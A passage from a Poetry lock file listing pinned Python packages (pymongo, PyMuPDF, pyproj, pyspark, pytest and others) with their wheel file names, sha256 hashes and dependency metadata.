"sha256:f3754acbd7efc7f1b529039fcffc092a15e1cf045e31f22f6c9c5950c613ec4d"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:631492573a1bef2f74f9ac0f9d84e0ce422c251644cd81207530af4aa2ee1980"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e2654d1278384cff75952682d17c718ecc1ad1d6227bb0068fd826ba47d426a5"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:168172ef7856e20ec024fe2a746bfa895c88b32720138e6438fd765ebd2b62dd"}, {file = "pymongo-4.5.0-cp38-cp38-win32.whl", hash = "sha256:b25f7bea162b3dbec6d33c522097ef81df7c19a9300722fa6853f5b495aecb77"}, {file = "pymongo-4.5.0-cp38-cp38-win_amd64.whl", hash = "sha256:b520aafc6cb148bac09ccf532f52cbd31d83acf4d3e5070d84efe3c019a1adbf"}, {file = "pymongo-4.5.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8543253adfaa0b802bfa88386db1009c6ebb7d5684d093ee4edc725007553d21"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux1_i686.whl", hash = "sha256:bc5d8c3647b8ae28e4312f1492b8f29deebd31479cd3abaa989090fb1d66db83"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:505f8519c4c782a61d94a17b0da50be639ec462128fbd10ab0a34889218fdee3"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:53f2dda54d76a98b43a410498bd12f6034b2a14b6844ca08513733b2b20b7ad8"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_i686.whl", hash = "sha256:9c04b9560872fa9a91251030c488e0a73bce9321a70f991f830c72b3f8115d0d"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_ppc64le.whl", hash = "sha256:58a63a26a1e3dc481dd3a18d6d9f8bd1d576cd1ffe0d479ba7dd38b0aeb20066"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_s390x.whl", hash = "sha256:f076b779aa3dc179aa3ed861be063a313ed4e48ae9f6a8370a9b1295d4502111"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:1b1d7d9aabd8629a31d63cd106d56cca0e6420f38e50563278b520f385c0d86e"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:37df8f6006286a5896d1cbc3efb8471ced42e3568d38e6cb00857277047b0d63"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:56320c401f544d762fc35766936178fbceb1d9261cd7b24fbfbc8fb6f67aa8a5"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:bbd705d5f3c3d1ff2d169e418bb789ff07ab3c70d567cc6ba6b72b04b9143481"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80a167081c75cf66b32f30e2f1eaee9365af935a86dbd76788169911bed9b5d5"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4c42748ccc451dfcd9cef6c5447a7ab727351fd9747ad431db5ebb18a9b78a4d"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:cf62da7a4cdec9a4b2981fcbd5e08053edffccf20e845c0b6ec1e77eb7fab61d"}, {file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:b5bbb87fa0511bd313d9a2c90294c88db837667c2bda2ea3fa7a35b59fd93b1f"}, {file = "pymongo-4.5.0-cp39-cp39-win32.whl", hash = "sha256:465fd5b040206f8bce7016b01d7e7f79d2fcd7c2b8e41791be9632a9df1b4999"}, {file = "pymongo-4.5.0-cp39-cp39-win_amd64.whl", hash = "sha256:63d8019eee119df308a075b8a7bdb06d4720bf791e2b73d5ab0e7473c115d79c"}, {file = "pymongo-4.5.0.tar.gz", hash = "sha256:681f252e43b3ef054ca9161635f81b730f4d8cadd28b3f2b2004f5a72f853982"}, ] [package.dependencies] dnspython = ">=1.16.0,<3.0.0" [package.extras] aws = ["pymongo-auth-aws (<2.0.0)"] encryption = ["certifi", "pymongo[aws]", "pymongocrypt (>=1.6.0,<2.0.0)"] gssapi = ["pykerberos", "winkerberos (>=0.5.0)"] ocsp = ["certifi", "cryptography (>=2.5)", "pyopenssl (>=17.2.0)", "requests (<3.0.0)", "service-identity (>=18.1.0)"] snappy = ["python-snappy"] zstd = ["zstandard"] [[package]] name = "pympler" version = "1.0.1" description = "A development tool to measure, monitor and analyze the memory behavior of Python objects." optional = true python-versions = ">=3.6" files = [ {file = "Pympler-1.0.1-py3-none-any.whl", hash = "sha256:d260dda9ae781e1eab6ea15bacb84015849833ba5555f141d2d9b7b7473b307d"}, {file = "Pympler-1.0.1.tar.gz", hash = "sha256:993f1a3599ca3f4fcd7160c7545ad06310c9e12f70174ae7ae8d4e25f6c5d3fa"}, ] [[package]] name = "pymupdf" version = "1.23.5" description = "A high performance Python library for data extraction, analysis, conversion & manipulation of PDF (and other) documents." optional = true python-versions = ">=3.8" files = [ {file = "PyMuPDF-1.23.5-cp310-none-macosx_10_9_x86_64.whl", hash = "sha256:c71b5e80a08272b9f3012314dc47ee2423270b30262d07ec7dd9709ae2bde1ac"}, {file = "PyMuPDF-1.23.5-cp310-none-macosx_11_0_arm64.whl", hash = "sha256:4b1bd9a91dee18bc95d7af2c593a214857a03e4fcd9a1eb01588df432de24c58"}, {file = "PyMuPDF-1.23.5-cp310-none-manylinux2014_aarch64.whl", hash = "sha256:eafa1bce0860320ddbb7edb4ab5678e02051db5450251ba8e918713d9a70c03c"}, {file = "PyMuPDF-1.23.5-cp310-none-manylinux2014_x86_64.whl", hash = "sha256:29e1d82b16f7580280ae35a0ae78de55f15c92ec87b7f3a1372f40f37a053bf3"}, {file = "PyMuPDF-1.23.5-cp310-none-win32.whl", hash = "sha256:d3bef175707693a2f53fe0fe4e546e3187c7876aedabfe43d9a916060bac9073"}, {file = "PyMuPDF-1.23.5-cp310-none-win_amd64.whl", hash = "sha256:da1b08b5348152f2940fa183d0265a6b6eb6f0292fae44b576eaf8e53723e336"}, {file = "PyMuPDF-1.23.5-cp311-none-macosx_10_9_x86_64.whl", hash = "sha256:59755a600c25a282589b548ffa045aed59c2df7b76943978cabb1825f0c03ec4"}, {file = "PyMuPDF-1.23.5-cp311-none-macosx_11_0_arm64.whl", hash = "sha256:264d5f6478d787c336520cf1a99e39bb6a0ef6d984550f925095c0e692dea7b5"}, {file = "PyMuPDF-1.23.5-cp311-none-manylinux2014_aarch64.whl", hash = "sha256:3f5fc705e8790217d23ab5e7ac2c05d82e050f6271b710300288adfe87a71072"}, {file = "PyMuPDF-1.23.5-cp311-none-manylinux2014_x86_64.whl", hash = "sha256:ee9e9ce1897eeac0fc33cf99084067c14250312a5dbc1372012c3d2f0e7a4af5"}, {file = "PyMuPDF-1.23.5-cp311-none-win32.whl", hash = "sha256:d2e9cfa46193fab196c27cb07561e1bb0938450984c2f01b3739f254a31b639e"}, {file = "PyMuPDF-1.23.5-cp311-none-win_amd64.whl", hash = "sha256:31405311c28fc8b3b2975a98b60bac388563748beaacb6da470f917678417e2d"}, {file = "PyMuPDF-1.23.5-cp312-none-macosx_10_9_x86_64.whl", hash = "sha256:64ab1097e3a077ae9db6a98d01e2e77087894ebd85b702edf5eb85d05ab8c0f1"}, {file = "PyMuPDF-1.23.5-cp312-none-macosx_11_0_arm64.whl", hash = "sha256:f7a8f91681b88ad216c36911e08ea25d2b3121350d52f4f8d76aeb0b7fcc6bef"}, {file = "PyMuPDF-1.23.5-cp312-none-manylinux2014_aarch64.whl", hash = "sha256:bb345ef1120db4f78ec0f229514d333ea3e7d367875c1400423a9b3e2b48ffc0"}, {file = "PyMuPDF-1.23.5-cp312-none-manylinux2014_x86_64.whl", hash = "sha256:9bde3683e254661e6b0032006f0ef7025ade2a33d3e3045499e71b76ea99942c"}, {file = "PyMuPDF-1.23.5-cp312-none-win32.whl", hash = "sha256:3a01c93c69e74068c1618631a750677fd088708d2b09b3c23809b099fa4ffa39"}, {file = "PyMuPDF-1.23.5-cp312-none-win_amd64.whl", hash = "sha256:693979ad4c8885729ac126b3202f1cb645f3392ad7e0964c2d924e61bc0e0a9d"}, {file = "PyMuPDF-1.23.5-cp38-none-macosx_10_9_x86_64.whl", hash = "sha256:9586bc98a322e546cf2e477309806aa4a3e1d18efc9b93fc2e2b3d8131e1b9f7"}, {file = "PyMuPDF-1.23.5-cp38-none-macosx_11_0_arm64.whl", hash = "sha256:faebdf8679706964f87617ee43b8d0107587d20b526892b538222146a4c32d43"}, {file = "PyMuPDF-1.23.5-cp38-none-manylinux2014_aarch64.whl", hash = "sha256:3400b582be3d71f1c0974701fcfda32f0c2ebb75a78c2aea430552b0c6896546"}, {file = "PyMuPDF-1.23.5-cp38-none-manylinux2014_x86_64.whl", hash = "sha256:fab599d23fa490725e5b5a70bfb6bc87acf5ceb70abe11ad2ef2b2f516961f31"}, {file = "PyMuPDF-1.23.5-cp38-none-win32.whl", hash = "sha256:53278c6a3d0a5dc8f221e0a77c065a61fd0598f9d8d9ef5be53de0c0a7d2df90"}, {file = "PyMuPDF-1.23.5-cp38-none-win_amd64.whl", hash = "sha256:dbce86df507f6bce118b12b33d893f1d3512013c898174211e903da78e1916aa"}, {file = "PyMuPDF-1.23.5-cp39-none-macosx_10_9_x86_64.whl", hash = "sha256:b234805b615b2d45dcb1bfe5c2167dc4121e31d618ab557856a3153b94c1676b"}, {file = "PyMuPDF-1.23.5-cp39-none-macosx_11_0_arm64.whl", hash = "sha256:4a53b2bf19be687160e4d18c27680e5326687aa39a7e31641d32a61edadbbfd9"}, {file = "PyMuPDF-1.23.5-cp39-none-manylinux2014_aarch64.whl", hash = "sha256:705a7aed0a917c35bb5efa4d94a7e8092705b3395726f9770d2b888de775f437"}, {file = "PyMuPDF-1.23.5-cp39-none-manylinux2014_x86_64.whl", hash = "sha256:332c1d5633c233458c4b65e6ad4a860391c507384bd2324a186b2702f8c64dfe"}, {file = "PyMuPDF-1.23.5-cp39-none-win32.whl", hash = "sha256:435a108cf8b53302500b52adb2cccbf2afa51c94ab3c705b250245090b46f5da"}, {file = "PyMuPDF-1.23.5-cp39-none-win_amd64.whl", hash = "sha256:460b47a1a17335d444ec441b68c083da5e51cdfcfa67a6638de69fe5e97f4ad2"}, {file = "PyMuPDF-1.23.5.tar.gz", hash = "sha256:4508ee04c46cac8356a9d04f0d9a63f845770d2abb54caf512b44d22f0e80300"}, ] [package.dependencies] PyMuPDFb = "1.23.5" [[package]] name = "pymupdfb" version = "1.23.5" description = "MuPDF shared libraries for PyMuPDF." optional = true python-versions = ">=3.8" files = [ {file = "PyMuPDFb-1.23.5-py3-none-macosx_10_9_x86_64.whl", hash = "sha256:d0095f28b2bcd64ed8a9636dfba193108eeb6c24d0ec71fa3f88cb15aee67a30"}, {file = "PyMuPDFb-1.23.5-py3-none-macosx_11_0_arm64.whl", hash = "sha256:80137c37a4b0d5abeb988434c7d7eb3f9087afdd0754f4bf2f8840a788e691ae"}, {file = "PyMuPDFb-1.23.5-py3-none-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:e26705e1a4ea42926b70c5655f2509d555a4774d1d1382ecc7e76466695209e6"}, {file = "PyMuPDFb-1.23.5-py3-none-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:2b71b5b7987f2ebe9f6893544151ede2de74ec30651eef584039eb5f9c7c02aa"}, {file = "PyMuPDFb-1.23.5-py3-none-win32.whl", hash = "sha256:f269814bafdffd5558d44af3de63eaa531d498de640a79cf6c7072011fd4088f"}, {file = "PyMuPDFb-1.23.5-py3-none-win_amd64.whl", hash = "sha256:85cbc308085a4ec794e0da790965985cc5ccb21b2abc09732e072f6eaf10150b"}, ] [[package]] name = "pyowm" version = "3.3.0" description = "A Python wrapper around OpenWeatherMap web APIs" optional = true python-versions = ">=3.7" files = [ {file = "pyowm-3.3.0-py3-none-any.whl", hash = "sha256:86463108e7613171531ba306040b43c972b3fc0b0acf73b12c50910cdd2107ab"}, {file = "pyowm-3.3.0.tar.gz", hash = "sha256:8196f77c91eac680676ed5ee484aae8a165408055e3e2b28025cbf60b8681e03"}, ] [package.dependencies] geojson = ">=2.3.0,<3" PySocks = ">=1.7.1,<2" requests = [ {version = ">=2.20.0,<3"}, {version = "*", extras = ["socks"]}, ] [[package]] name = "pyparsing" version = "3.1.1" description = "pyparsing module - Classes and methods to define and execute parsing grammars" optional = true python-versions = ">=3.6.8" files = [ {file = "pyparsing-3.1.1-py3-none-any.whl", hash = "sha256:32c7c0b711493c72ff18a981d24f28aaf9c1fb7ed5e9667c9e84e3db623bdbfb"}, {file = "pyparsing-3.1.1.tar.gz", hash = "sha256:ede28a1a32462f5a9705e07aea48001a08f7cf81a021585011deba701581a0db"}, ] [package.extras] diagrams = ["jinja2", "railroad-diagrams"] [[package]] name = "pypdf" version = "3.16.4" description = "A pure-python PDF library capable of splitting, merging, cropping, and transforming PDF files" optional = true python-versions = ">=3.6" files = [ {file = "pypdf-3.16.4-py3-none-any.whl", hash = "sha256:a9b1eaf2db4c2edd93093470d33c3f353235c4a694f8a426a92a8ce77cea9eb7"}, {file = "pypdf-3.16.4.tar.gz", hash = "sha256:01927771b562d4ba84939ef95b393f0179166da786c5db710d07f807c52f480d"}, ] [package.dependencies] typing_extensions = {version = ">=3.7.4.3", markers = "python_version < \"3.10\""} [package.extras] crypto = ["PyCryptodome", "cryptography"] dev = ["black", "flit", "pip-tools", "pre-commit (<2.18.0)", "pytest-cov", "pytest-socket", "pytest-timeout", "wheel"] docs = ["myst_parser", "sphinx", "sphinx_rtd_theme"] full = ["Pillow (>=8.0.0)", "PyCryptodome", "cryptography"] image = ["Pillow (>=8.0.0)"] [[package]] name = "pypdfium2" version = "4.22.0" description = "Python bindings to PDFium" optional = true python-versions = ">= 3.6" files = [ {file = "pypdfium2-4.22.0-py3-none-macosx_10_13_x86_64.whl", hash = "sha256:398e4173b9bd2b9cce509b2ed655bbf2bf7b76f408ecf6c099e189996a28bbae"}, {file = "pypdfium2-4.22.0-py3-none-macosx_11_0_arm64.whl", hash = "sha256:9aa3f3357014c1a9e1a45706eca4c214b79b9253447605992c1ede4422e343d9"}, {file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_aarch64.whl", hash = "sha256:5335b128fa7764655e8d9f7349fe8c48293a3f61b4272709e15327a85b72ee90"}, {file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_armv7l.whl", hash = "sha256:5e039a2d6283a5cae7b2b8c1454b7bec08025515b640e2ffd99452d4a85e73f9"}, {file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_i686.whl", hash = "sha256:5d618ba82bbad8ca8a93a0e3dc6d1a5f1d0698a34049de85dd51a4b6b398e696"}, {file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:5e928c6b37315ef686d3e427f9b30b2f58f1e98bb0622471874c1dde39337f03"}, {file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_aarch64.whl", hash = "sha256:a8afd323889edbdc864881dba833f96c550a0be78a0ddd35040e10adfbce0aa2"}, {file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_i686.whl", hash = "sha256:f6bcedc51327d335ed471f5b8c27a6d6bfad20249f3d79bc79bfe469d93fbe7a"}, {file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_x86_64.whl", hash = "sha256:9101be6fd7f749ab8def0bc5b93f93ec4c45ce0634b9ddcf2cc921d8e08bb763"}, {file = "pypdfium2-4.22.0-py3-none-win32.whl", hash = "sha256:3970154748fc0ee48bb22ffc15a5d66054b6ca553180bb84d743ee8192413549"}, {file = "pypdfium2-4.22.0-py3-none-win_amd64.whl", hash = "sha256:02399c25c1f3d30fa80de616dffc0becd885f4b8a03e7dfae3afb553b49644e3"}, {file = "pypdfium2-4.22.0-py3-none-win_arm64.whl", hash = "sha256:caddf0de2d25e0572a3ddbb7b6c6d60ad9c68290fab593e7a2609f06a88d6fdf"}, {file = "pypdfium2-4.22.0.tar.gz", hash = "sha256:c29d09b59ed65c5f27d81af9c985c89da7b10c0ac3775dfb2474a94a6d6dc850"}, ] [[package]] name = "pyphen" version = "0.14.0" description = "Pure Python module to hyphenate text" optional = true python-versions = ">=3.7" files = [ {file = "pyphen-0.14.0-py3-none-any.whl", hash = "sha256:414c9355958ca3c6a3ff233f65678c245b8ecb56418fb291e2b93499d61cd510"}, {file = "pyphen-0.14.0.tar.gz", hash = "sha256:596c8b3be1c1a70411ba5f6517d9ccfe3083c758ae2b94a45f2707346d8e66fa"}, ] [package.extras] doc = ["sphinx", "sphinx_rtd_theme"] test = ["flake8", "isort", "pytest"] [[package]] name = "pyproj" version = "3.5.0" description = "Python interface to PROJ (cartographic projections and coordinate transformations library)" optional = true python-versions = ">=3.8" files = [ {file = "pyproj-3.5.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:6475ce653880938468a1a1b7321267243909e34b972ba9e53d5982c41d555918"}, {file = "pyproj-3.5.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:61e4ad57d89b03a7b173793b31bca8ee110112cde1937ef0f42a70b9120c827d"}, {file = "pyproj-3.5.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7bdd2021bb6f7f346bfe1d2a358aa109da017d22c4704af2d994e7c7ee0a7a53"}, {file = "pyproj-3.5.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5674923351e76222e2c10c58b5e1ac119d7a46b270d822c463035971b06f724b"}, {file = "pyproj-3.5.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cd5e2b6aa255023c4acd0b977590f1f7cc801ba21b4d806fcf6dfac3474ebb83"}, {file = "pyproj-3.5.0-cp310-cp310-win32.whl", hash = "sha256:6f316a66031a14e9c5a88c91f8b77aa97f5454895674541ed6ab630b682be35d"}, {file = "pyproj-3.5.0-cp310-cp310-win_amd64.whl", hash = "sha256:f7c2f4d9681e810cf40239caaca00079930a6d9ee6591139b88d592d36051d82"}, {file = "pyproj-3.5.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7572983134e310e0ca809c63f1722557a040fe9443df5f247bf11ba887eb1229"}, {file = "pyproj-3.5.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:eccb417b91d0be27805dfc97550bfb8b7db94e9fe1db5ebedb98f5b88d601323"}, {file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:621d78a9d8bf4d06e08bef2471021fbcb1a65aa629ad4a20c22e521ce729cc20"}, {file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d9a024370e917c899bff9171f03ea6079deecdc7482a146a2c565f3b9df134ea"}, {file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1b7c2113c4d11184a238077ec85e31eda1dcc58ffeb9a4429830e0a7036e787d"}, {file = "pyproj-3.5.0-cp311-cp311-win32.whl", hash = "sha256:a730f5b4c98c8a0f312437873e6e34dbd4cc6dc23d5afd91a6691c62724b1f68"}, {file = "pyproj-3.5.0-cp311-cp311-win_amd64.whl", hash = "sha256:e97573de0ab3bbbcb4c7748bc41f4ceb6da10b45d35b1a294b5820701e7c25f0"}, {file = "pyproj-3.5.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2b708fd43453b985642b737d4a6e7f1d6a0ab1677ffa4e14cc258537b49224b0"}, {file = "pyproj-3.5.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b60d93a200639e8367c6542a964fd0aa2dbd152f256c1831dc18cd5aa470fb8a"}, {file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:38862fe07316ae12b79d82d298e390973a4f00b684f3c2d037238e20e00610ba"}, {file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:71b65f2a38cd9e16883dbb0f8ae82bdf8f6b79b1b02975c78483ab8428dbbf2f"}, {file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b752b7d9c4b08181c7e8c0d9c7f277cbefff42227f34d3310696a87c863d9dd3"}, {file = "pyproj-3.5.0-cp38-cp38-win32.whl", hash = "sha256:b937215bfbaf404ec8f03ca741fc3f9f2c4c2c5590a02ccddddd820ae3c71331"}, {file = "pyproj-3.5.0-cp38-cp38-win_amd64.whl", hash = "sha256:97ed199033c2c770e7eea2ef80ff5e6413426ec2d7ec985b869792f04ab95d05"}, {file = "pyproj-3.5.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:052c49fce8b5d55943a35c36ccecb87350c68b48ba95bc02a789770c374ef819"}, {file = "pyproj-3.5.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:1507138ea28bf2134d31797675380791cc1a7156a3aeda484e65a78a4aba9b62"}, {file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c02742ef3d846401861a878a61ef7ad911ea7539d6cc4619ddb52dbdf7b45aee"}, {file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:385b0341861d3ebc8cad98337a738821dcb548d465576527399f4955ca24b6ed"}, {file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8fe6bb1b68a35d07378d38be77b5b2f8dd2bea5910c957bfcc7bee55988d3910"}, {file = "pyproj-3.5.0-cp39-cp39-win32.whl", hash = "sha256:5c4b85ac10d733c42d73a2e6261c8d6745bf52433a31848dd1b6561c9a382da3"}, {file = "pyproj-3.5.0-cp39-cp39-win_amd64.whl", hash = "sha256:1798ff7d65d9057ebb2d017ffe8403268b8452f24d0428b2140018c25c7fa1bc"}, {file = "pyproj-3.5.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:d711517a8487ef3245b08dc82f781a906df9abb3b6cb0ce0486f0eeb823ca570"}, {file = "pyproj-3.5.0-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:788a5dadb532644a64efe0f5f01bf508c821eb7e984f13a677d56002f1e8a67a"}, {file = "pyproj-3.5.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:73f7960a97225812f9b1d7aeda5fb83812f38de9441e3476fcc8abb3e2b2f4de"}, {file = "pyproj-3.5.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:fde5ece4d2436b5a57c8f5f97b49b5de06a856d03959f836c957d3e609f2de7e"}, {file = "pyproj-3.5.0-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e08db25b61cf024648d55973cc3d1c3f1d0818fabf594d5f5a8e2318103d2aa0"}, {file = "pyproj-3.5.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a87b419a2a352413fbf759ecb66da9da50bd19861c8f26db6a25439125b27b9"}, {file = "pyproj-3.5.0.tar.gz", hash = "sha256:9859d1591c1863414d875ae0759e72c2cffc01ab989dc64137fbac572cc81bf6"}, ] [package.dependencies] certifi = "*" [[package]] name = "pyproject-hooks" version = "1.0.0" description = "Wrappers to call pyproject.toml-based build backend hooks." optional = true python-versions = ">=3.7" files = [ {file = "pyproject_hooks-1.0.0-py3-none-any.whl", hash = "sha256:283c11acd6b928d2f6a7c73fa0d01cb2bdc5f07c57a2eeb6e83d5e56b97976f8"}, {file = "pyproject_hooks-1.0.0.tar.gz", hash = "sha256:f271b298b97f5955d53fb12b72c1fb1948c22c1a6b70b315c54cedaca0264ef5"}, ] [package.dependencies] tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""} [[package]] name = "pyre-extensions" version = "0.0.23" description = "Type system extensions for use with the pyre type checker" optional = true python-versions = "*" files = [ {file = "pyre-extensions-0.0.23.tar.gz", hash = "sha256:df019263900af45e83e41fb9e889824e8b7bcdb9cb67fe2957bb80104eadcbc7"}, {file = "pyre_extensions-0.0.23-py3-none-any.whl", hash = "sha256:e945fdf4113172cec517c5daeca56f61f6632fd5b8d8165f1253c8865c87e62b"}, ] [package.dependencies] typing-extensions = "*" typing-inspect = "*" [[package]] name = "pyreadline3" version = "3.4.1" description = "A python implementation of GNU readline." optional = true python-versions = "*" files = [ {file = "pyreadline3-3.4.1-py3-none-any.whl", hash = "sha256:b0efb6516fd4fb07b45949053826a62fa4cb353db5be2bbb4a7aa1fdd1e345fb"}, {file = "pyreadline3-3.4.1.tar.gz", hash = "sha256:6f3d1f7b8a31ba32b73917cefc1f28cc660562f39aea8646d30bd6eff21f7bae"}, ] [[package]] name = "pysocks" version = "1.7.1" description = "A Python SOCKS client module. See https://github.com/Anorov/PySocks for more information." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "PySocks-1.7.1-py27-none-any.whl", hash = "sha256:08e69f092cc6dbe92a0fdd16eeb9b9ffbc13cadfe5ca4c7bd92ffb078b293299"}, {file = "PySocks-1.7.1-py3-none-any.whl", hash = "sha256:2725bd0a9925919b9b51739eea5f9e2bae91e83288108a9ad338b2e3a4435ee5"}, {file = "PySocks-1.7.1.tar.gz", hash = "sha256:3f8804571ebe159c380ac6de37643bb4685970655d3bba243530d6558b799aa0"}, ] [[package]] name = "pyspark" version = "3.5.0" description = "Apache Spark Python API" optional = true python-versions = ">=3.8" files = [ {file = "pyspark-3.5.0.tar.gz", hash = "sha256:d41a9b76bd2aca370a6100d075c029e22ba44c5940927877e9435a3a9c566558"}, ] [package.dependencies] py4j = "0.10.9.7" [package.extras] connect = ["googleapis-common-protos (>=1.56.4)", "grpcio (>=1.56.0)", "grpcio-status (>=1.56.0)", "numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"] ml = ["numpy (>=1.15)"] mllib = ["numpy (>=1.15)"] pandas-on-spark = ["numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"] sql = ["numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"] [[package]] name = "pytesseract" version = "0.3.10" description = "Python-tesseract is a python wrapper for Google's Tesseract-OCR" optional = true python-versions = ">=3.7" files = [ {file = "pytesseract-0.3.10-py3-none-any.whl", hash = "sha256:8f22cc98f765bf13517ead0c70effedb46c153540d25783e04014f28b55a5fc6"}, {file = "pytesseract-0.3.10.tar.gz", hash = "sha256:f1c3a8b0f07fd01a1085d451f5b8315be6eec1d5577a6796d46dc7a62bd4120f"}, ] [package.dependencies] packaging = ">=21.3" Pillow = ">=8.0.0" [[package]] name = "pytest" version = "7.4.3" description = "pytest: simple powerful testing with Python" optional = false python-versions = ">=3.7" files = [ {file = "pytest-7.4.3-py3-none-any.whl", hash = "sha256:0d009c083ea859a71b76adf7c1d502e4bc170b80a8ef002da5806527b9591fac"}, {file = "pytest-7.4.3.tar.gz", hash = "sha256:d989d136982de4e3b29dabcc838ad581c64e8ed52c11fbe86ddebd9da0818cd5"}, ] [package.dependencies] colorama = {version = "*", markers = "sys_platform == \"win32\""} exceptiongroup = {version = ">=1.0.0rc8", markers = "python_version < \"3.11\""} iniconfig = "*" packaging = "*" pluggy = ">=0.12,<2.0" tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""} [package.extras] testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"] [[package]] name = "pytest-asyncio" version = "0.20.3" description = "Pytest support for asyncio" optional = false python-versions = ">=3.7" files = [ {file = "pytest-asyncio-0.20.3.tar.gz", hash = "sha256:83cbf01169ce3e8eb71c6c278ccb0574d1a7a3bb8eaaf5e50e0ad342afb33b36"}, {file = "pytest_asyncio-0.20.3-py3-none-any.whl", hash = "sha256:f129998b209d04fcc65c96fc85c11e5316738358909a8399e93be553d7656442"}, ] [package.dependencies] pytest = ">=6.1.0" [package.extras] docs = ["sphinx (>=5.3)", "sphinx-rtd-theme (>=1.0)"] testing = ["coverage (>=6.2)", "flaky (>=3.5.0)", "hypothesis (>=5.7.1)", "mypy (>=0.931)", "pytest-trio (>=0.7.0)"] [[package]] name = "pytest-cov" version = "4.1.0" description = "Pytest plugin for measuring coverage." optional = false python-versions = ">=3.7" files = [ {file = "pytest-cov-4.1.0.tar.gz", hash = "sha256:3904b13dfbfec47f003b8e77fd5b589cd11904a21ddf1ab38a64f204d6a10ef6"}, {file = "pytest_cov-4.1.0-py3-none-any.whl", hash = "sha256:6ba70b9e97e69fcc3fb45bfeab2d0a138fb65c4d0d6a41ef33983ad114be8c3a"}, ] [package.dependencies] coverage = {version = ">=5.2.1", extras = ["toml"]} pytest = ">=4.6" [package.extras] testing = ["fields", "hunter", "process-tests", "pytest-xdist", "six", "virtualenv"] 